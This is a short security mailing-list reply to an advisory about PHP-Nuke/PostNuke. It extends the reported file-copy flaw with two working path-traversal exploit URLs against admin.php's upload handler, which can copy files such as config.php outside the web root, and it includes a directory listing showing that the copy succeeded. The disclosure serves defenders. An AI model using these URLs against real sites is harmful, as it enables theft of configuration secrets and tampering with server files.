Re: twlc advisory: all versions of php nuke are vulnerable...

[Paul Starzetz <paul () starzetz de>]

supergate () twlc net wrote:

> Summary
> This time the bug is really dangerous...it allows you to 'cp' any file on
> the box... or even upload files...

and even copy outside the postnuke path:

http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt

or for example:

http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&userfile=/../../../../../../../tmp/copyme.txt&userfile_name=/../../../../../../../tmp/hacked.txt

root@somehost:/tmp > ls -la
total 20
drwxrwxrwt   8 root     root         2048 Sep 25 13:37 .
drwxr-xr-x  19 root     root         2048 Feb 28  2001 ..
drwxrwxrwt   2 root     root         2048 Mar  6  2001 .X11-unix
-rw-r--r--   1 root     root          851 Sep 25 13:37 copyme.txt
-rwxr-xr-x   1 wwwrun   wwwrun        851 Sep 25 13:37 hacked.txt
...

Postnuke breaks with elemntary secure coding practices...

/ihq